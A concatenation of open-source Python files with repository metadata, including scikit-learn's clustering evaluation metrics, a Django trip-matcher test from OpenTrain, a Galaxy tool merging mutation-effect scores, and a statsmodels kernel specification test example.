std = np.array( [ d for d in annotations[i] if np.sum(d) > 0 ] ).std (axis=0)
annotations[i] = np.array( (annotations[i] - mean)/std ) # Normalization Per sample
print >> sys.stderr, '# Sample NO.', i + 1,'\n', mean,'\n', std
data, distance, leftIdn, rightIdn, nr, aa, bb = [],[],[],[],[],[],[]
for i in range( len(annotations[0]) ) :
if not mark[i][0] : continue # Next if makr[i] == 0
anno = np.array( [ annotations[s][i] for s in range( sampleNum ) if len(annotations[s][i][annotations[s][i]!=0]) > 0 ] ) # each person in the same position
if len( anno ) == 0 : continue
leg, n, alt, bot, leftIden, rightIden = np.median( anno, axis=0 )
distance.append( [ mark[i][0], mark[i][1], leg ] )
leftIdn.append ( [ mark[i][0], mark[i][1], leftIden ] )
rightIdn.append( [ mark[i][0], mark[i][1], rightIden ] )
nr.append ( [ mark[i][0], mark[i][1], n ] )
aa.append ( [ mark[i][0], mark[i][1], alt ] )
bb.append ( [ mark[i][0], mark[i][1], bot ] )
data.append([leg, alt, leftIden, rightIden, n, bot])
print mark[i][0], mark[i][1], '\t', leg, '\t', leftIden, '\t', rightIden,'\t', n, '\t', alt, '\t', bot
data = np.array(data)
print >> sys.stderr, '\nPosition\tALTernatePerfect\tLeftIdentity\tRightIdentity\tAveIden\tNRatio\tBothImperfect'
print >> sys.stderr, 'Means: ', data.mean(axis=0), '\nstd : ', data.std(axis=0), '\nMedian: ', np.median( data, axis=0 )
print >> sys.stderr, '25 Percentile:', np.percentile(data, 25,axis=0), '\n50 Percentile:', np.percentile(data, 50,axis=0), '\n75 Percentile:', np.percentile(data, 75,axis=0)
DrawFig( figPrefix, \
np.array (distance ), \
np.array (leftIdn ), \
np.array (rightIdn ), \
np.array (nr ), \
np.array (aa ), \
np.array (bb ) )
if __name__ == '__main__' :
main(sys.argv[1:])
| mit |
hasadna/OpenTrain | webserver/opentrain/algorithm/trip_matcher_test.py | 1 | 3681 | """ comment
export DJANGO_SETTINGS_MODULE="opentrain.settings"
"""
import os
import sys
sys.path.append(os.getcwd())
sys.path.append(os.path.dirname(os.getcwd()))
os.environ['DJANGO_SETTINGS_MODULE']='opentrain.settings'
#/home/oferb/docs/train_project/OpenTrains/webserver
import timetable.services
import analysis.models
import numpy as np
from scipy import spatial
try:
import matplotlib.pyplot as plt
except ImportError:
pass
import config
import itertools
import datetime
from unittest import TestCase
import unittest
import time
from display_utils import *
from export_utils import *
from train_tracker import add_report, get_trusted_trips
import stops
from common.mock_reports_generator import generate_mock_reports
from analysis.models import SingleWifiReport
from redis_intf.client import get_redis_pipeline, get_redis_client
from stop_detector import DetectedStopTime
from trip_matcher import get_matched_trips
import random
import cProfile
class trip_matcher_test(TestCase):
def test_matcher_on_full_trip(self, trip_id = '010714_00115'):
detected_stop_times_gtfs, day = self.load_trip_info_for_matcher(trip_id)
trip_delays_ids_list_of_lists = get_matched_trips('test_matcher_on_full_trip', detected_stop_times_gtfs,\
day)
self.assertEquals(len(trip_delays_ids_list_of_lists), 1)
matched_trip_ids = get_trusted_trips(trip_delays_ids_list_of_lists)
self.assertEquals(matched_trip_ids[0], trip_id)
def test_matcher_on_trip_set(self, trip_ids = ['010714_00283', '010714_00115']):
detected_stop_times_gtfs_all = []
for trip_id in trip_ids:
detected_stop_times_gtfs, day = self.load_trip_info_for_matcher(trip_id)
detected_stop_times_gtfs_all += detected_stop_times_gtfs
trip_delays_ids_list_of_lists = get_matched_trips('test_matcher_on_full_trip', detected_stop_times_gtfs_all,\
day)
self.assertEquals(len(trip_delays_ids_list_of_lists), 2)
matched_trip_ids = sorted(get_trusted_trips(trip_delays_ids_list_of_lists))
self.assertEquals(matched_trip_ids, sorted(trip_ids))
def test_matcher_on_partial_random_trip(self, trip_id = '010714_00115', seeds=[0,1,2,3], stop_counts=[3,4,5]):
for seed in seeds:
for stop_count in stop_counts:
print 'seed =', seed, 'stop_count =', stop_count
detected_stop_times_gtfs, day = self.load_trip_info_for_matcher(trip_id)
random.seed(seed)
subset_inds = sorted(random.sample(xrange(0,len(detected_stop_times_gtfs)),stop_count))
detected_stop_times_gtfs_subset = [detected_stop_times_gtfs[i] for i in subset_inds]
trip_delays_ids_list_of_lists = get_matched_trips('test_matcher_on_full_trip', detected_stop_times_gtfs,\
day)
self.assertEquals(len(trip_delays_ids_list_of_lists), 1)
matched_trip_ids = get_trusted_trips(trip_delays_ids_list_of_lists)
self.assertEquals(matched_trip_ids[0], unicode(trip_id))
def load_trip_info_for_matcher(self, trip_id):
day = datetime.datetime.strptime(trip_id.split('_')[0], '%d%m%y').date()
trip = timetable.services.get_trip(trip_id)
stop_times_gtfs = trip.get_stop_times()
detected_stop_times_gtfs = [DetectedStopTime.load_from_gtfs(x, day) for x in stop_times_gtfs]
return detected_stop_times_gtfs, day
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
luo66/scikit-learn | sklearn/metrics/cluster/supervised.py | 207 | 27395 | """Utilities to evaluate the clustering performance of models
Functions named as *_score return a scalar value to maximize: the higher the
better.
"""
# Authors: Olivier Grisel <olivier.grisel@ensta.org>
# Wei LI <kuantkid@gmail.com>
# Diego Molla <dmolla-aliod@gmail.com>
# License: BSD 3 clause
from math import log
from scipy.misc import comb
from scipy.sparse import coo_matrix
import numpy as np
from .expected_mutual_info_fast import expected_mutual_information
from ...utils.fixes import bincount
def comb2(n):
# the exact version is faster for k == 2: use it by default globally in
# this module instead of the float approximate variant
return comb(n, 2, exact=1)
def check_clusterings(labels_true, labels_pred):
"""Check that the two clusterings matching 1D integer arrays"""
labels_true = np.asarray(labels_true)
labels_pred = np.asarray(labels_pred)
# input checks
if labels_true.ndim != 1:
raise ValueError(
"labels_true must be 1D: shape is %r" % (labels_true.shape,))
if labels_pred.ndim != 1:
raise ValueError(
"labels_pred must be 1D: shape is %r" % (labels_pred.shape,))
if labels_true.shape != labels_pred.shape:
raise ValueError(
"labels_true and labels_pred must have same size, got %d and %d"
% (labels_true.shape[0], labels_pred.shape[0]))
return labels_true, labels_pred
def contingency_matrix(labels_true, labels_pred, eps=None):
"""Build a contengency matrix describing the relationship between labels.
Parameters
----------
labels_true : int array, shape = [n_samples]
Ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
Cluster labels to evaluate
eps: None or float
If a float, that value is added to all values in the contingency
matrix. This helps to stop NaN propagation.
If ``None``, nothing is adjusted.
Returns
-------
contingency: array, shape=[n_classes_true, n_classes_pred]
Matrix :math:`C` such that :math:`C_{i, j}` is the number of samples in
true class :math:`i` and in predicted class :math:`j`. If
``eps is None``, the dtype of this array will be integer. If ``eps`` is
given, the dtype will be float.
"""
classes, class_idx = np.unique(labels_true, return_inverse=True)
clusters, cluster_idx = np.unique(labels_pred, return_inverse=True)
n_classes = classes.shape[0]
n_clusters = clusters.shape[0]
# Using coo_matrix to accelerate simple histogram calculation,
# i.e. bins are consecutive integers
# Currently, coo_matrix is faster than histogram2d for simple cases
contingency = coo_matrix((np.ones(class_idx.shape[0]),
(class_idx, cluster_idx)),
shape=(n_classes, n_clusters),
dtype=np.int).toarray()
if eps is not None:
# don't use += as contingency is integer
contingency = contingency + eps
return contingency
# clustering measures
def adjusted_rand_score(labels_true, labels_pred):
"""Rand index adjusted for chance
The Rand Index computes a similarity measure between two clusterings
by considering all pairs of samples and counting pairs that are
assigned in the same or different clusters in the predicted and
true clusterings.
The raw RI score is then "adjusted for chance" into the ARI score
using the following scheme::
ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)
The adjusted Rand index is thus ensured to have a value close to
0.0 for random labeling independently of the number of clusters and
samples and exactly 1.0 when the clusterings are identical (up to
a permutation).
ARI is a symmetric measure::
adjusted_rand_score(a, b) == adjusted_rand_score(b, a)
Read more in the :ref:`User Guide <adjusted_rand_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
Ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
Cluster labels to evaluate
Returns
-------
ari : float
Similarity score between -1.0 and 1.0. Random labelings have an ARI
close to 0.0. 1.0 stands for perfect match.
Examples
--------
Perfectly maching labelings have a score of 1 even
>>> from sklearn.metrics.cluster import adjusted_rand_score
>>> adjusted_rand_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> adjusted_rand_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Labelings that assign all classes members to the same clusters
are complete be not always pure, hence penalized::
>>> adjusted_rand_score([0, 0, 1, 2], [0, 0, 1, 1]) # doctest: +ELLIPSIS
0.57...
ARI is symmetric, so labelings that have pure clusters with members
coming from the same classes but unnecessary splits are penalized::
>>> adjusted_rand_score([0, 0, 1, 1], [0, 0, 1, 2]) # doctest: +ELLIPSIS
0.57...
If classes members are completely split across different clusters, the
assignment is totally incomplete, hence the ARI is very low::
>>> adjusted_rand_score([0, 0, 0, 0], [0, 1, 2, 3])
0.0
References
----------
.. [Hubert1985] `L. Hubert and P. Arabie, Comparing Partitions,
Journal of Classification 1985`
http://www.springerlink.com/content/x64124718341j1j0/
.. [wk] http://en.wikipedia.org/wiki/Rand_index#Adjusted_Rand_index
See also
--------
adjusted_mutual_info_score: Adjusted Mutual Information
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
n_samples = labels_true.shape[0]
classes = np.unique(labels_true)
clusters = np.unique(labels_pred)
# Special limit cases: no clustering since the data is not split;
# or trivial clustering where each document is assigned a unique cluster.
# These are perfect matches hence return 1.0.
if (classes.shape[0] == clusters.shape[0] == 1
or classes.shape[0] == clusters.shape[0] == 0
or classes.shape[0] == clusters.shape[0] == len(labels_true)):
return 1.0
contingency = contingency_matrix(labels_true, labels_pred)
# Compute the ARI using the contingency data
sum_comb_c = sum(comb2(n_c) for n_c in contingency.sum(axis=1))
sum_comb_k = sum(comb2(n_k) for n_k in contingency.sum(axis=0))
sum_comb = sum(comb2(n_ij) for n_ij in contingency.flatten())
prod_comb = (sum_comb_c * sum_comb_k) / float(comb(n_samples, 2))
mean_comb = (sum_comb_k + sum_comb_c) / 2.
return ((sum_comb - prod_comb) / (mean_comb - prod_comb))
def homogeneity_completeness_v_measure(labels_true, labels_pred):
"""Compute the homogeneity and completeness and V-Measure scores at once
Those metrics are based on normalized conditional entropy measures of
the clustering labeling to evaluate given the knowledge of a Ground
Truth class labels of the same samples.
A clustering result satisfies homogeneity if all of its clusters
contain only data points which are members of a single class.
A clustering result satisfies completeness if all the data points
that are members of a given class are elements of the same cluster.
Both scores have positive values between 0.0 and 1.0, larger values
being desirable.
Those 3 metrics are independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score values in any way.
V-Measure is furthermore symmetric: swapping ``labels_true`` and
``label_pred`` will give the same score. This does not hold for
homogeneity and completeness.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
Returns
-------
homogeneity: float
score between 0.0 and 1.0. 1.0 stands for perfectly homogeneous labeling
completeness: float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
v_measure: float
harmonic mean of the first two
See also
--------
homogeneity_score
completeness_score
v_measure_score
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
if len(labels_true) == 0:
return 1.0, 1.0, 1.0
entropy_C = entropy(labels_true)
entropy_K = entropy(labels_pred)
MI = mutual_info_score(labels_true, labels_pred)
homogeneity = MI / (entropy_C) if entropy_C else 1.0
completeness = MI / (entropy_K) if entropy_K else 1.0
if homogeneity + completeness == 0.0:
v_measure_score = 0.0
else:
v_measure_score = (2.0 * homogeneity * completeness
/ (homogeneity + completeness))
return homogeneity, completeness, v_measure_score
def homogeneity_score(labels_true, labels_pred):
"""Homogeneity metric of a cluster labeling given a ground truth
A clustering result satisfies homogeneity if all of its clusters
contain only data points which are members of a single class.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is not symmetric: switching ``label_true`` with ``label_pred``
will return the :func:`completeness_score` which will be different in
general.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
Returns
-------
homogeneity: float
score between 0.0 and 1.0. 1.0 stands for perfectly homogeneous labeling
References
----------
.. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
conditional entropy-based external cluster evaluation measure
<http://aclweb.org/anthology/D/D07/D07-1043.pdf>`_
See also
--------
completeness_score
v_measure_score
Examples
--------
Perfect labelings are homogeneous::
>>> from sklearn.metrics.cluster import homogeneity_score
>>> homogeneity_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Non-perfect labelings that further split classes into more clusters can be
perfectly homogeneous::
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 0, 1, 2]))
... # doctest: +ELLIPSIS
1.0...
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 1, 2, 3]))
... # doctest: +ELLIPSIS
1.0...
Clusters that include samples from different classes do not make for an
homogeneous labeling::
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 1, 0, 1]))
... # doctest: +ELLIPSIS
0.0...
>>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 0, 0, 0]))
... # doctest: +ELLIPSIS
0.0...
"""
return homogeneity_completeness_v_measure(labels_true, labels_pred)[0]
def completeness_score(labels_true, labels_pred):
"""Completeness metric of a cluster labeling given a ground truth
A clustering result satisfies completeness if all the data points
that are members of a given class are elements of the same cluster.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is not symmetric: switching ``label_true`` with ``label_pred``
will return the :func:`homogeneity_score` which will be different in
general.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
Returns
-------
completeness: float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
References
----------
.. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
conditional entropy-based external cluster evaluation measure
<http://aclweb.org/anthology/D/D07/D07-1043.pdf>`_
See also
--------
homogeneity_score
v_measure_score
Examples
--------
Perfect labelings are complete::
>>> from sklearn.metrics.cluster import completeness_score
>>> completeness_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Non-perfect labelings that assign all classes members to the same clusters
are still complete::
>>> print(completeness_score([0, 0, 1, 1], [0, 0, 0, 0]))
1.0
>>> print(completeness_score([0, 1, 2, 3], [0, 0, 1, 1]))
1.0
If classes members are split across different clusters, the
assignment cannot be complete::
>>> print(completeness_score([0, 0, 1, 1], [0, 1, 0, 1]))
0.0
>>> print(completeness_score([0, 0, 0, 0], [0, 1, 2, 3]))
0.0
"""
return homogeneity_completeness_v_measure(labels_true, labels_pred)[1]
def v_measure_score(labels_true, labels_pred):
"""V-measure cluster labeling given a ground truth.
This score is identical to :func:`normalized_mutual_info_score`.
The V-measure is the harmonic mean between homogeneity and completeness::
v = 2 * (homogeneity * completeness) / (homogeneity + completeness)
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
Returns
-------
v_measure: float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
References
----------
.. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
conditional entropy-based external cluster evaluation measure
<http://aclweb.org/anthology/D/D07/D07-1043.pdf>`_
See also
--------
homogeneity_score
completeness_score
Examples
--------
Perfect labelings are both homogeneous and complete, hence have score 1.0::
>>> from sklearn.metrics.cluster import v_measure_score
>>> v_measure_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> v_measure_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Labelings that assign all classes members to the same clusters
are complete be not homogeneous, hence penalized::
>>> print("%.6f" % v_measure_score([0, 0, 1, 2], [0, 0, 1, 1]))
... # doctest: +ELLIPSIS
0.8...
>>> print("%.6f" % v_measure_score([0, 1, 2, 3], [0, 0, 1, 1]))
... # doctest: +ELLIPSIS
0.66...
Labelings that have pure clusters with members coming from the same
classes are homogeneous but un-necessary splits harms completeness
and thus penalize V-measure as well::
>>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 0, 1, 2]))
... # doctest: +ELLIPSIS
0.8...
>>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 1, 2, 3]))
... # doctest: +ELLIPSIS
0.66...
If classes members are completely split across different clusters,
the assignment is totally incomplete, hence the V-Measure is null::
>>> print("%.6f" % v_measure_score([0, 0, 0, 0], [0, 1, 2, 3]))
... # doctest: +ELLIPSIS
0.0...
Clusters that include samples from totally different classes totally
destroy the homogeneity of the labeling, hence::
>>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 0, 0, 0]))
... # doctest: +ELLIPSIS
0.0...
"""
return homogeneity_completeness_v_measure(labels_true, labels_pred)[2]
def mutual_info_score(labels_true, labels_pred, contingency=None):
"""Mutual Information between two clusterings
The Mutual Information is a measure of the similarity between two labels of
the same data. Where :math:`P(i)` is the probability of a random sample
occurring in cluster :math:`U_i` and :math:`P'(j)` is the probability of a
random sample occurring in cluster :math:`V_j`, the Mutual Information
between clusterings :math:`U` and :math:`V` is given as:
.. math::
MI(U,V)=\sum_{i=1}^R \sum_{j=1}^C P(i,j)\log\\frac{P(i,j)}{P(i)P'(j)}
This is equal to the Kullback-Leibler divergence of the joint distribution
with the product distribution of the marginals.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Read more in the :ref:`User Guide <mutual_info_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
A clustering of the data into disjoint subsets.
labels_pred : array, shape = [n_samples]
A clustering of the data into disjoint subsets.
contingency: None or array, shape = [n_classes_true, n_classes_pred]
A contingency matrix given by the :func:`contingency_matrix` function.
If value is ``None``, it will be computed, otherwise the given value is
used, with ``labels_true`` and ``labels_pred`` ignored.
Returns
-------
mi: float
Mutual information, a non-negative value
See also
--------
adjusted_mutual_info_score: Adjusted against chance Mutual Information
normalized_mutual_info_score: Normalized Mutual Information
"""
if contingency is None:
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
contingency = contingency_matrix(labels_true, labels_pred)
contingency = np.array(contingency, dtype='float')
contingency_sum = np.sum(contingency)
pi = np.sum(contingency, axis=1)
pj = np.sum(contingency, axis=0)
outer = np.outer(pi, pj)
nnz = contingency != 0.0
# normalized contingency
contingency_nm = contingency[nnz]
log_contingency_nm = np.log(contingency_nm)
contingency_nm /= contingency_sum
# log(a / b) should be calculated as log(a) - log(b) for
# possible loss of precision
log_outer = -np.log(outer[nnz]) + log(pi.sum()) + log(pj.sum())
mi = (contingency_nm * (log_contingency_nm - log(contingency_sum))
+ contingency_nm * log_outer)
return mi.sum()
def adjusted_mutual_info_score(labels_true, labels_pred):
"""Adjusted Mutual Information between two clusterings
Adjusted Mutual Information (AMI) is an adjustment of the Mutual
Information (MI) score to account for chance. It accounts for the fact that
the MI is generally higher for two clusterings with a larger number of
clusters, regardless of whether there is actually more information shared.
For two clusterings :math:`U` and :math:`V`, the AMI is given as::
AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [max(H(U), H(V)) - E(MI(U, V))]
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Be mindful that this function is an order of magnitude slower than other
metrics, such as the Adjusted Rand Index.
Read more in the :ref:`User Guide <mutual_info_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
A clustering of the data into disjoint subsets.
labels_pred : array, shape = [n_samples]
A clustering of the data into disjoint subsets.
Returns
-------
ami: float(upperlimited by 1.0)
The AMI returns a value of 1 when the two partitions are identical
(ie perfectly matched). Random partitions (independent labellings) have
an expected AMI around 0 on average hence can be negative.
See also
--------
adjusted_rand_score: Adjusted Rand Index
mutual_information_score: Mutual Information (not adjusted for chance)
Examples
--------
Perfect labelings are both homogeneous and complete, hence have
score 1.0::
>>> from sklearn.metrics.cluster import adjusted_mutual_info_score
>>> adjusted_mutual_info_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> adjusted_mutual_info_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
If classes members are completely split across different clusters,
the assignment is totally in-complete, hence the AMI is null::
>>> adjusted_mutual_info_score([0, 0, 0, 0], [0, 1, 2, 3])
0.0
References
----------
.. [1] `Vinh, Epps, and Bailey, (2010). Information Theoretic Measures for
Clusterings Comparison: Variants, Properties, Normalization and
Correction for Chance, JMLR
<http://jmlr.csail.mit.edu/papers/volume11/vinh10a/vinh10a.pdf>`_
.. [2] `Wikipedia entry for the Adjusted Mutual Information
<http://en.wikipedia.org/wiki/Adjusted_Mutual_Information>`_
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
n_samples = labels_true.shape[0]
classes = np.unique(labels_true)
clusters = np.unique(labels_pred)
# Special limit cases: no clustering since the data is not split.
# This is a perfect match hence return 1.0.
if (classes.shape[0] == clusters.shape[0] == 1
or classes.shape[0] == clusters.shape[0] == 0):
return 1.0
contingency = contingency_matrix(labels_true, labels_pred)
contingency = np.array(contingency, dtype='float')
# Calculate the MI for the two clusterings
mi = mutual_info_score(labels_true, labels_pred,
contingency=contingency)
# Calculate the expected value for the mutual information
emi = expected_mutual_information(contingency, n_samples)
# Calculate entropy for each labeling
h_true, h_pred = entropy(labels_true), entropy(labels_pred)
ami = (mi - emi) / (max(h_true, h_pred) - emi)
return ami
def normalized_mutual_info_score(labels_true, labels_pred):
"""Normalized Mutual Information between two clusterings
Normalized Mutual Information (NMI) is an normalization of the Mutual
Information (MI) score to scale the results between 0 (no mutual
information) and 1 (perfect correlation). In this function, mutual
information is normalized by ``sqrt(H(labels_true) * H(labels_pred))``
This measure is not adjusted for chance. Therefore
:func:`adjusted_mustual_info_score` might be preferred.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Read more in the :ref:`User Guide <mutual_info_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
A clustering of the data into disjoint subsets.
labels_pred : array, shape = [n_samples]
A clustering of the data into disjoint subsets.
Returns
-------
nmi: float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
See also
--------
adjusted_rand_score: Adjusted Rand Index
adjusted_mutual_info_score: Adjusted Mutual Information (adjusted
against chance)
Examples
--------
Perfect labelings are both homogeneous and complete, hence have
score 1.0::
>>> from sklearn.metrics.cluster import normalized_mutual_info_score
>>> normalized_mutual_info_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> normalized_mutual_info_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
If classes members are completely split across different clusters,
the assignment is totally in-complete, hence the NMI is null::
>>> normalized_mutual_info_score([0, 0, 0, 0], [0, 1, 2, 3])
0.0
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
classes = np.unique(labels_true)
clusters = np.unique(labels_pred)
# Special limit cases: no clustering since the data is not split.
# This is a perfect match hence return 1.0.
if (classes.shape[0] == clusters.shape[0] == 1
or classes.shape[0] == clusters.shape[0] == 0):
return 1.0
contingency = contingency_matrix(labels_true, labels_pred)
contingency = np.array(contingency, dtype='float')
# Calculate the MI for the two clusterings
mi = mutual_info_score(labels_true, labels_pred,
contingency=contingency)
# Calculate the expected value for the mutual information
# Calculate entropy for each labeling
h_true, h_pred = entropy(labels_true), entropy(labels_pred)
nmi = mi / max(np.sqrt(h_true * h_pred), 1e-10)
return nmi
def entropy(labels):
"""Calculates the entropy for a labeling."""
if len(labels) == 0:
return 1.0
label_idx = np.unique(labels, return_inverse=True)[1]
pi = bincount(label_idx).astype(np.float)
pi = pi[pi > 0]
pi_sum = np.sum(pi)
# log(a / b) should be calculated as log(a) - log(b) for
# possible loss of precision
return -np.sum((pi / pi_sum) * (np.log(pi) - log(pi_sum)))
| bsd-3-clause |
fw1121/galaxy_tools | driver_to_inchlib/driver_to_inchlib.py | 2 | 4327 | #!/usr/bin/env python
import sys
import argparse
import pandas
MAPPINGS={"ma": [ 8], "sift": [10,14], "polyphen" : []}
keys = ["sift", "ma", "polyphen"]
def stop_err(msg, err=1):
sys.stderr.write('%s\n' % msg)
sys.exit(err)
def main_web(args):
if args[1]:
print args[1]
stop_err("Unknown parameters")
var = vars(args[0])
params = [x for x in var if var[x]!=None]
if len(params) < 2:
stop_err("Need atleast two data to merge")
data = {"ma_input": None, "sift_input": None, "polyphen_input": None}
if var['sift_input']:
data["sift_input"] = pandas.read_csv(var['sift_input'], delimiter='\t')[MAPPINGS["sift"]]
#annotations = pandas.read_csv(var['sift_input'], delimiter='\t')[[1]]
if var['ma_input']:
annotations = pandas.read_csv(var['ma_input'], delimiter='\t')[[1]]
data["ma_input"] = pandas.read_csv(var['ma_input'], delimiter='\t')[MAPPINGS["ma"]]
if var["sift_input"] and var["ma_input"]:
merge_df = data["sift_input"].join(data["ma_input"])
merge_df.columns = ['Provean', 'Sift', 'MA' ]
if var["polyphen_input"]:
merge_df = merge_df.join(data["polyphen_input"])
merge_df.columns = ['Provean', 'Sift', 'MA', 'Polyphen' ]
if var["sift_input"] and var["polyphen_input"]:
merge_df = var["sift_input"].join(var["ma_input"])
merge_df.columns = ['Provean', 'Sift', 'Polyphen' ]
if var["ma_input"]:
merge_df = merge_df.join(data["ma_input"])
merge_df.columns = ['Provean', 'Sift', 'Polyphen', 'MA' ]
if var["ma_input"] and var["polyphen_input"]:
merge_df = var["ma_input"].join(var["ma_input"])
merge_df.columns = ['MA', 'Polyphen' ]
if var["sift_input"]:
merge_df = merge_df.join(data["sift_input"])
merge_df.columns = ['Polyphen', 'MA', 'Provean', 'Sift']
merge_df.insert(0, 'annotations', annotations)
merge_df = merge_df.dropna()
annotations = merge_df["annotations"]
classes = pandas.Series([x.split(",")[1] for x in annotations])
del(merge_df["annotations"])
i = pandas.Series(merge_df.index)
metadata_df = pandas.concat([i, classes], axis=1)
if var["treat_binary"]:
##Set Damaging mutatiomn to true
if var["sift_input"]:
merge_df["Sift"] = merge_df["Sift"] <= var["sift_threshold"]
merge_df["Provean"] = merge_df["Provean"] <= var["provean_threshold"]
if var["polyphen_input"]:
merge_df["Polyphen"] = merge_df["Sift"] >= var["polyphen_threshold"]
if var["ma_input"]:
merge_df["MA"] = merge_df["MA"] >= var["ma_threshold"]
merge_df = merge_df.astype(int)
merge_df.insert(0,'annotations', merge_df.index)
metadata_df.columns =['annotations', 'class']
merge_df.to_csv(var["output"], index=False)
metadata_df.to_csv(var["metadata"], index=False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Process input output paths")
parser.add_argument('--sift_input',
type=str,
help='Input file location')
parser.add_argument('--sift_threshold',
type=float,
help='SIFT thresholdn')
parser.add_argument('--provean_threshold',
type=float,
help='Provean thresholdn')
parser.add_argument('--polyphen_input',
type=float,
help='Input file location')
parser.add_argument('--polyphen_threshold',
type=float,
help='Provean thresholdn')
parser.add_argument('--ma_input',
type=str,
help='Input file location')
parser.add_argument('--ma_threshold',
type=float,
help='Input file location')
parser.add_argument('--treat-binary', action='store_true')
parser.add_argument('--metadata',
type=str,
help='Metadata file location')
parser.add_argument('--output',
type=str,
help='Output file location')
args = parser.parse_known_args()
main_web(args)
| mit |
hainm/statsmodels | statsmodels/examples/ex_kernel_test_functional.py | 34 | 2246 | # -*- coding: utf-8 -*-
"""
Created on Tue Jan 08 19:03:20 2013
Author: Josef Perktold
"""
from __future__ import print_function
if __name__ == '__main__':
import numpy as np
from statsmodels.regression.linear_model import OLS
#from statsmodels.nonparametric.api import KernelReg
import statsmodels.sandbox.nonparametric.kernel_extras as smke
seed = np.random.randint(999999)
#seed = 661176
print(seed)
np.random.seed(seed)
sig_e = 0.5 #0.1
nobs, k_vars = 200, 1
x = np.random.uniform(-2, 2, size=(nobs, k_vars))
x.sort()
order = 3
exog = x**np.arange(order + 1)
beta = np.array([1, 1, 0.1, 0.0])[:order+1] # 1. / np.arange(1, order + 2)
y_true = np.dot(exog, beta)
y = y_true + sig_e * np.random.normal(size=nobs)
endog = y
print('DGP')
print('nobs=%d, beta=%r, sig_e=%3.1f' % (nobs, beta, sig_e))
mod_ols = OLS(endog, exog[:,:2])
res_ols = mod_ols.fit()
#'cv_ls'[1000, 0.5][0.01, 0.45]
tst = smke.TestFForm(endog, exog[:,:2], bw=[0.01, 0.45], var_type='cc',
fform=lambda x,p: mod_ols.predict(p,x),
estimator=lambda y,x: OLS(y,x).fit().params,
nboot=1000)
print('bw', tst.bw)
print('tst.test_stat', tst.test_stat)
print(tst.sig)
print('tst.boots_results mean, min, max', (tst.boots_results.mean(),
tst.boots_results.min(),
tst.boots_results.max()))
print('lower tail bootstrap p-value', (tst.boots_results < tst.test_stat).mean())
print('upper tail bootstrap p-value', (tst.boots_results >= tst.test_stat).mean())
from scipy import stats
